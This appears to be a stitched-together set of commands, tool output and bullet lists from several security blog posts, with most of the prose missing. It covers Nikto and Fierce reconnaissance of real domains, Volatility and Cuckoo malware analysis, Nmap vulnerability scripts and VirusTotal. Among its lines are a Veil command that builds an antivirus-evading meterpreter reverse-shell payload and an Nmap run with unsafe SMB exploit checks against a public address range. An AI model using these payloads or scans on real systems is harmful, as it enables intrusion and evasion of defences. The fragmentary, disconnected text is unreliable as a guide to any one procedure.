sudo apt-get install tor

sudo apt-get install proxychains

socks4 127.0.0.1 9050

 

1. People who download and execute suspicious programs (ActiveX, Java applet...) without understanding the consequences.
2. Downloads that happening without user authorization (malware, browser exploits...).

• Over 6500 dangerous files/CGIs.
• More than 1250 outdated version for several web servers.
• Specific problems on over 270 servers.
• Presence of index files.
• HTTP server options like TRACE.
• Installed software and web servers.

jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

<?php phpinfo(); ?>

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -h
fierce.pl (C) Copywrite 2006,2007 - By RSnake at http://ha.ckers.org/fierce/

    Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Options:
    -connect    Attempt to make http connections to any non RFC1918
        (public) addresses.  This will output the return headers but
        be warned, this could take a long time against a company with
        many targets, depending on network/machine lag.  I wouldn't
        recommend doing this unless it's a small company or you have a
        lot of free time on your hands (could take hours-days). 
        Inside the file specified the text "Host:\n" will be replaced
        by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

    -delay        The number of seconds to wait between lookups.
    -dns        The domain you would like scanned.
    -dnsfile      Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
    -dnsserver    Use a particular DNS server for reverse lookups
        (probably should be the DNS server of the target).  Fierce
        uses your DNS server for the initial SOA query and then uses
        the target's DNS server for all additional queries by default.
    -file        A file you would like to output to be logged to.
    -fulloutput    When combined with -connect this will output everything
        the webserver sends back, not just the HTTP headers.
    -help        This screen.
    -nopattern    Don't use a search pattern when looking for nearby
        hosts.  Instead dump everything.  This is really noisy but
        is useful for finding other domains that spammers might be
        using.  It will also give you lots of false positives,
        especially on large domains.
    -range        Scan an internal IP range (must be combined with
        -dnsserver).  Note, that this does not support a pattern
        and will simply output anything it finds.  Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

    -search        Search list.  When fierce attempts to traverse up and
        down ipspace it may encounter other servers within other
        domains that may belong to the same company.  If you supply a
        comma delimited list to fierce it will report anything found.
        This is especially useful if the corporate servers are named
        different from the public facing website.  Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

        Note that using search could also greatly expand the number of
        hosts found, as it will continue to traverse once it locates
        servers that you specified in your search list.  The more the
        better.
    -suppress    Suppress all TTY output (when combined with -file).
    -tcptimeout    Specify a different timeout (default 10 seconds).  You
        may want to increase this if the DNS server you are querying
        is slow or has a lot of network lag.
    -threads  Specify how many threads to use while scanning (default
      is single threaded).
    -traverse    Specify a number of IPs above and below whatever IP you
        have found to look for nearby IPs.  Default is 5 above and
        below.  Traverse will not move into other C blocks.
    -version    Output the version number.
    -wide        Scan the entire class C after finding any matching
        hostnames in that class C.  This generates a lot more traffic
        but can uncover a lot more information.
    -wordlist    Use a seperate wordlist (one word per line).  Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt 

root@bt:/pentest/enumeration/
dns/fierce# ./fierce.pl -range 65.55.58.0-255
65.55.58.2    ten1-2-194.co1-6nf-1a.ntwk.msn.net
65.55.58.3    ten1-2-194.co1-6nf-1b.ntwk.msn.net
65.55.58.38    discussions.connect.microsoft.com
65.55.58.183    submit.microsoft.com
65.55.58.186    cvp.membership.microsoft.com
65.55.58.192    microsoftevents.org
65.55.58.197    eugrantsadvisor.com
65.55.58.201    00001001.ch
65.55.58.202    bizspark.microsoft.com
65.55.58.204    cvp.services.microsoft.com
65.55.58.205    piinternalfe2.microsoft.com
65.55.58.206    cvp.services.ppe.microsoft.com
65.55.58.210    livests.test.itasignon.com
65.55.58.211    sts.test.itasignon.com
65.55.58.212    beta.itasignon.microsoft.com
65.55.58.213    itasignon.microsoft.com
65.55.58.214    websitespark.microsoft.com
65.55.58.241    co1vlsc04.microsoft.com
65.55.58.242    co1vlsc05.microsoft.com
65.55.58.243    co1vlsc06.microsoft.com
65.55.58.247    lva.beta.msllab.microsoft.com
65.55.58.248    pi.beta.msllab.microsoft.com

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -dns google.es -dnsserver 208.67.222.222
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
...
...
...

root@bt:/pentest/enumeration/dns/fierce# more hosts.txt
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
...
...
...

$ ./scalp-0.4.py --help
Scalp the apache log! by Romain Gaucher - http://rgaucher.info
usage:  ./scalp.py [--log|-l log_file] [--filters|-f filter_file] [--period time-frame] [OPTIONS] [--attack a1,a2,..,an]
                   [--sample|-s 4.2]
   --log       |-l:  the apache log file './access_log' by default
   --filters   |-f:  the filter file     './default_filter.xml' by default
   --exhaustive|-e:  will report all type of attacks detected and not stop
                     at the first found
   --tough     |-u:  try to decode the potential attack vectors (may increase
                     the examination time)
   --period    |-p:  the period must be specified in the same format as in
                     the Apache logs using * as wild-card
                     ex: 04/Apr/2008:15:45;*/Mai/2008
                     if not specified at the end, the max or min are taken
   --html      |-h:  generate an HTML output
   --xml       |-x:  generate an XML output
   --text      |-t:  generate a simple text output (default)
   --except    |-c:  generate a file that contains the non examined logs due to the
                     main regular expression; ill-formed Apache log etc.
   --attack    |-a:  specify the list of attacks to look for
                     list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
                     the list of attacks should not contains spaces and comma separated
                     ex: xss,sqli,lfi,ref
   --output    |-o:  specifying the output directory; by default, scalp will try to write
                     in the same directory as the log file
   --sample    |-s:  use a random sample of the lines, the number (float in [0,100]) is
                     the percentage, ex: --sample 0.1 for 1/1000

python scalp-0.4.py -l /var/log/apache2/access.log -f default_filter.xml -o scalp-output/ --html

python vol.py -f zeus.vmem imageinfo

python vol.py -f zeus.vmem pstree

python vol.py -f zeus.vmem connscan

python vol.py -f zeus.vmem pstree

python vol.py -f zeus.vmem printkey -K "Microsoft\Windows NT\CurrentVersion\Winlogon"

python vol.py -f zeus.vmem malfind --dump-dir evidencias/

 

python vol.py -f zeus.vmem mutantscan

python vol.py -f zeus.vmem mutantscan | grep AVIRA

python vol.py -f zeus.vmem printkey -K "ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"

• Volatility - CommandReference 
• Volatility Documentation Project
• Volatility - FeaturesByPlugin  

• Traffic captures in Pcap format.
• Traces of win32 API calls.
• Information about processes created by the malware.
• Files that have been downloaded, modified or removed during the malware execution.
• Register keys that have been modified.
• Malware behavior.
• Screenshots taken while the malware was running.

lsb_release -a
No LSB modules are available
Distributor ID:    Ubuntu
Description:    Ubuntu 10.04.3 LTS
Release:    10.04
Codename:    lucid

apt-get install python-sqlalchemy

• Dpkt (Highly Recommended): for extracting relevant information from PCAP files.
• Jinja2 (Highly Recommended): for rendering the HTML reports and the web interface.
• Magic (Optional): for identifying files’ formats (otherwise use “file” command line utility)
• Pydeep (Optional): for calculating ssdeep fuzzy hash of files.
• Pymongo (Optional): for storing the results in a MongoDB database.
• Yara and Yara Python (Optional): for matching Yara signatures (use the svn version).
• Libvirt (Optional): for using the KVM machine manager.
• Bottlepy (Optional): for using the web.py and api.py utilities.
• Pefile (Optional): used for static analysis of PE32 binaries.

apt-get install python-dpkt python-jinja2 python-magic python-libvirt python-bottle python-pefile

apt-get install python-pip
pip install pymongo

apt-get install libpcre3 libpcre3-dev
wget http://yara-project.googlecode.com/files/yara-1.7.tar.gz
wget http://yara-project.googlecode.com/files/yara-python-1.7.tar.gz
tar xvfz yara-1.7.tar.gz
cd yara-1.7
./configure
make
make check
cd ..
tar xvfz yara-python-1.7.tar.gz
cd yara-python-1.7
python setup.py build
python setup.py install

tar xvfz ssdeep-2.10.tar.gz
cd ssdeep-2.10
./configure
make
make check
make install

wget https://github.com/kbandla/pydeep/archive/master.zip
unzip master.zip
cd pydeep-master
python setup.py build
sudo python setup.py install

apt-get install tcpdump
chmod +s /usr/sbin/tcpdump
apt-get install libcap2-bin
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
apt-get install libcap2-bin
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump

wget http://download.virtualbox.org/virtualbox/4.2.16/virtualbox-4.2_4.2.16-86992~Ubuntu~lucid_i386.deb
dpkg -i virtualbox-4.2_4.2.16-86992~Ubuntu~lucid_i386.deb

adduser cuckoo
usermod -G vboxusers cuckoo

wget https://github.com/cuckoobox/cuckoo/archive/master.zip
unzip master.zip
cd cuckoo-master/ 

• Pyton for Windows: http://python.org/download/
• PIL Python module to created desktop screenshots: http://www.pythonware.com/products/pil/

mode = headless
path = /usr/bin/VBoxManage
machines = Cuckoo Sandbox
label = Cuckoo Sandbox
platform = windows
ip = 192.168.56.101

[cuckoo]
version_check = on
delete_original = off
machine_manager = virtualbox
[resultserver]
ip = 192.168.56.1
port = 2042
interface = vboxnet0

vboxmanage hostonlyif create
vboxmanage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1
vboxmanage modifyvm 'Cuckoo Sandbox' --hostonlyadapter1 vboxnet0
vboxmanage modifyvm 'Cuckoo Sandbox' --nic1 hostonly

Static IP - 192.168.56.101
DNS - any DNS server (8.8.8.8)
Default Gateway - 192.168.56.1

sudo iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A POSTROUTING -t nat -j MASQUERADE
sudo echo 1 > /proc/sys/net/ipv4/ip_forward or sudo sysctl -w net.ipv4.ip_forward=1

vboxmanage snapshot "Cuckoo Sandbox" take "Cuckoo Sandbox" --pause

pip install argparse

jnieto@behindthefirewalls:~/cuckoo/cuckoo-master$ python cuckoo.py 

python submit.py /home/jnieto/cuckoo/cuckoo-master/malware_samples/iwmsax.exe

vboxmanage controlvm "Cuckoo Sandbox" poweroff
vboxmanage snapshot "Cuckoo Sandbox" restorecurrent
vboxheadless --startvm "Cuckoo Sandbox"

• Added 91 new fingerprints bringing the new to 4.118.
• Their signatures have been increased from 273 to 8.979.
• The tool stills detect 897 popular protocols like http, ssh, smpt, snmp, imap, pop3 or another not too popular like gopher-proxy, airdroid, enemyterritory...
• Some IPv6 OS fingerprints added.
• [Nsock] Added initial proxy support to Nsock.
• Added 14 NSE scripts with a total 446.
• Now we have the option to mix IPv4 range notation with CIDR netmasks. For example 192.168-1.4-100,200.7/24
• Timeout script-args are now standardized to use the timespec (30s, 900ms, 20h, etc.)
• [Ncat] Added --lua-exec. This feature allows us to run Lua scripts with Ncat.
• ...

• hostmap-ip2hosts
• http-adobe-coldfusion-apsa1301
• http-coldfusion-subzero
• http-comments-displayer
• http-fileupload-exploiter
• http-phpmyadmin-dir-traversal
• http-stored-xss
• http-vuln-cve2013-0156
• ike-version
• murmur-version
• mysql-enum
• teamspeak2-version
• ventrilo-info

wget http://nmap.org/dist/nmap-6.40.tar.bz2
bzip2 -cd nmap-6.40.tar.bz2 | tar xvf -
cd nmap-6.40
./configure
make
sudo make install

jnieto@behindthefirewalls.com:~/nmap-6.40/scripts$ nmap -V
Nmap version 6.40 ( http://nmap.org )
Platform: x86_64-unknown-linux-gnu
Compiled with: nmap-liblua-5.2.2 openssl-1.0.1c libpcre-8.31 nmap-libpcap-1.2.1 nmap-libdnet-1.12 ipv6
Compiled without:
Available nsock engines: epoll poll select

nmap --script hostmap-ip2hosts.nse -sn -Pn behindthefirewalls.com

nmap --script=hostmap-robtex.nse -sn -Pn linkedin.com

nmap --script=http-drupal-enum-users drupal.org -p 80,443 -Pn

nmap --script=http-waf-detect.nse www.toyota.jp -p 80 -Pn

nmap --script=whois.nse www.facebook.com -p 80 -Pn

• MS08-067, a Windows RPC vulnerability.
• Conficker, an infection by the Conficker worm.
• Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000.
• SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497).
• MS06-025, a Windows Ras RPC service vulnerabilityMS07-029, a Windows Dns Server RPC service vulnerability.

sudo nmap -sU -sS --script smb-check-vulns.nse --script-args=unsafe=1 -p U:137,T:139 161.111.80.0/24

• afp-path-vuln.nse
• ftp-vuln-cve2010-4221.nse
• http-huawei-hg5xx-vuln.nse
• http-iis-webdav-vuln.nse
• http-vmware-path-vuln.nse
• http-vuln-cve2009-3960.nse
• http-vuln-cve2010-0738.nse
• http-vuln-cve2010-2861.nse
• http-vuln-cve2011-3192.nse
• http-vuln-cve2011-3368.nse
• http-vuln-cve2012-1823.nse
• http-vuln-cve2013-0156.nse
• mysql-vuln-cve2012-2122.nse
• rdp-vuln-ms12-020.nse
• rmi-vuln-classloader.nse
• samba-vuln-cve-2012-1182.nse
• smb-check-vulns.nse
• smb-vuln-ms10-054.nse
• smb-vuln-ms10-061.nse
• smtp-vuln-cve2010-4344.nse
• smtp-vuln-cve2011-1720.nse
• smtp-vuln-cve2011-1764.nse

• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
• Try to create each payload as random as possible.

• x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh 

apt-get update
apt-get install veil 

./Veil

• Enter metasploit payload: "windows/meterpreter/reverse_tcp"
• Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
• Enter value for 'LPORT': "443"

./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443

git clone https://github.com/golismero/golismero.git

• OpenVAS installations pre-configured.
• VirtualBox tools.
• GoLismero updater.
• GoLismero stable and develop version.

python golismero.py --help

python golismero.py --plugin-list

• csv:  Import the results of a Nikto scan in CSV format.
• xml:  Import the results of an OpenVAS scan.

• default_error_page:  Identifies default error pages for most commonly used web servers.
• dns_analyzer:  Tries to find hidden subdomains by enumerating them using the DNS protocol.
• dns_subdomains_bruteforcer:  Tries to find hidden subdomains by brute force.
• dns_zone_transfer:  Tries to make a DNS zone transfer.
• fingerprint_os:  Fingerprinter of server operating systems.
• fingerprint_web:  Fingerprinter of web servers.
• robots:  Analyzes robots.txt files and extracts their links.
• spider:  Web spider plugin. Without it, GoLismero can't crawl web sites.
• suspicious_url:  Flags suspicious words in URLs.
• theharvester:  Integration with theHarvester (https://code.google.com/p/theharvester/).

• brute_directories:  Tries to discover hidden folders by brute force:  www.site.com/folder/ -> www.site.com/folder2 www.site.com/folder3 ...
• brute_extensions:  Tries to discover hidden files by brute force:  www.site.com/index.php -> www.site.com/index.php.old
• brute_permutations:  Tries to discover hidden files by bruteforcing the extension:  www.site.com/index.php -> www.site.com/index.php2
• brute_predictables:  Tries to discover hidden files at predictable locations. For example: (Apache) www.site.com/error_log
• brute_prefixes:  Tries to discover hidden files by bruteforcing prefixes:  www.site.com/index.php -> www.site.com/~index.php
• brute_suffixes:  Tries to discover hidden files by bruteforcing suffixes:  www.site.com/index.php -> www.site.com/index2.php
• nikto:  Run the Nikto scanner and import the results.
• openvas:  Run the OpenVAS scanner and import the results

• html:  Plugin to generate HTML reports.
• text:  Creates text reports in files or on screen.

• console:  Console user interface.
• disabled:  Empty user interface.

python golismero.py --plugin-info openvas

python golismero.py --plugin-info nikto

sudo python golismero.py -d theharvester,openvas,dns* --forbid-subdomains --audit-name MyProject -o MyProject.html www.example.es

• With "-d" option, we are telling to GoLismero that we don't want to use theharvester, openvas and the rest of plugins which begin with "dns".
• With "--forbid-subdomains" we avoid attacking other subdomains. We are going to focus in only one target.
• With "--audit-name MyProject" we are going to save the results in a database named MyProject.db.
• With "-o MyProject.html" we are going to generate a HTML report.

 

• Integration with Nmap, SQLMap, Metasploit and many other tools.
• Web UI.
• Export results in PDF format.

• Submitting a file to https://www.virustotal.com/ (Maximum file size: 64M)

• Searching the SHA256, SHA1 or MD5 hash in https://www.virustotal.com/en/#search First you need to get the hash and then, type it in the link above. 

• Looking for if a domain is hosting or has been hosted malware in https://www.virustotal.com/en/#search

• VirusTotal Uploader: Installing the Windows desktop application you can send files to VirusTotal with just two clicks. You can download this application from https://www.virustotal.com/en/documentation/desktop-applications/virustotal-uploader

• Also, if you open VirusTotal Uploader from Start -> All programs -> VirusTotal Uploader 2.0 you will be able to select a process running in your computer and upload to Virustotal in order to check if it is a malicious process or not.

• VTzilla: Mozilla Firefox Browser Extension. With this plugin you can send the file to Virustotal just before download it.

• Also, with VTzilla, Virustotal install a toolbar in your Firefox browser. Here you can look for viruses, hashes or scan the site you are currently visiting. 

• Virustotal app for mobile. With this tool, you can detect if the applications installed in your mobile are detected by some anti-virus. You only need to install it and just open it.

• Email: Sending an email to scan@virustotal.com with the suspicious file attached to the email. You should write "SCAN" in the subject field if you want to receive the results in plain text. If you want to receive the result in XML format, you should write SCAN+XML in the subject field.(Maximum file size: 32M)

• Public API: You can upload files to Virustotal without the necessity of using the web browser. It allows you to build your own scripts to work with Virustotal automatically. Nmap has a script that helps you to look for a hash in the Virustotal database from the command line interface but first of all, you need to obtain your API key. To get it, you need to register at the Virustotal website. You can see the key in your user profile. Remember this service mustn't be used for commercial products or services purposes.

nmap --script http-virustotal --script-args='apikey="key",checksum="275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"'

• PE signature block.
• PE header basic information.
• PE sections.
• PE imports.
• Number of PE resources by type.
• Number of PE resources by language.
• ExifTool file metadata.

We can use tools like Dependency Walker, PEview, PEBrowse Professional, PE Header Summary to achieve our goal but in this post we will use Cuckoo Sandbox.

• .text: This section should be contain the program's code.
• .rdata: The .rdata section contains the imports an export information.
• .data: This section contains the programs global data.
• .rsrc: This sections usually contains the resources needed by the executable like images, icons...

Library KERNEL32.DLL

COMCTL32.dll and GDI32

MPR.dll

• WNetGetConnectionW: This import retrieves the name of the network resource associated with a local device and it could have three parameters; lpLocalName, lpRemoteName and lpnLengt.
• WNetGetConnectionW: This import makes a connection to a network resource and can redirect a local device to the network resource.

USER32.dll

• FtpOpenFileW:"This function initiates access to a remote file for writing or reading."
• FtpGetFileSize:"This function retrieves the file size of the requested FTP resource."

WSOCK32.dll

CONCLUSION

1. It is a malware sample because the majority of the anti-virus vendors have detected it as Backdoor.
2. The malware developers try to hide the program's code packing the file.
3. The developer tries to make malware analysis a difficult task by using IsDebuggerPresent API. (You can learn a trick about how to not be detected by the malware when you open the executable in a debugger).
4. When the program is executed, it calls to a lot of APIs in order to read and search files. Maybe the program steals private information reading documents or writing the password captured by a possible keylogger.
5. It has graphical capabilities. It is possible that it has a GUI.
6. Network resources API calls have been found in the malware imports. There are possibilities that the malware will try to steal information from our local network or trying to infect to other users through the shared resources.
7. It has network functions such as HTTP and FTP. The malware could get into a botnet network and receive the orders through the Internet. Also, it is possible that the program uploads the data that has been stolen via HTTP or FTP to the hacker servers.

base64 -d script_to_decode.vbs

CONCLUSION